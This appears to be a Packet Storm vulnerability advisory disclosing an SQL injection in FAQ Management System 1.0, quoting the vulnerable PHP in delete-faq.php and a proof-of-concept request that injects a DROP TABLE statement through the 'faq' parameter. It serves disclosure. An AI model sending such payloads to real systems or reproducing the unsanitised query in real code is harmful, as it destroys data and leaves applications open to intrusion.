Security
Headlines
HeadlinesLatestCVEs

Headline

FAQ Management System 1.0 SQL Injection

FAQ Management System version 1.0 suffers from a remote SQL injection vulnerability.

Packet Storm
#sql#vulnerability#windows#google#php#auth

Exploit Title: FAQ Management System - SQL Injection

Google Dork: N/A

Application: FAQ Management System

Date: 25.02.2024

Bugs: SQL Injection

Exploit Author: SoSPiro

Vendor Homepage: https://www.sourcecodester.com/

Software Link: https://www.sourcecodester.com/php/17175/faq-management-system-using-php-and-mysql-source-code.html

Version: 1.0

Tested on: Windows 10 64 bit Wampserver

CVE : N/A

Vulnerability Description:

The provided code is vulnerable to SQL injection. The vulnerability arises from directly using user input ($_GET[‘faq’]) in the SQL query without proper validation or sanitization. An attacker can manipulate the ‘faq’ parameter to inject malicious SQL code, leading to unintended and potentially harmful database operations.

Proof of Concept (PoC):

An attacker can manipulate the ‘faq’ parameter to perform SQL injection. For example:

  1. Original Request:
    http://example.com/endpoint/delete-faq.php?faq=123

2.Malicious Request (SQL Injection):
http://example.com/endpoint/delete-faq.php?faq=123’; DROP TABLE tbl_faq; –

This would result in a query like:

DELETE FROM tbl_faq WHERE tbl_faq_id = '123’; DROP TABLE tbl_faq; –

Which can lead to the deletion of data or even the entire table.

poc foto: https://i.imgur.com/1IENYFg.png

Vulnerable code section:

====================================================
endpoint/delete-faq.php

$faq = $_GET[‘faq’];

// …

$query = "DELETE FROM tbl_faq WHERE tbl_faq_id = '$faq’";

Packet Storm: Latest News

Ubuntu Security Notice USN-7121-3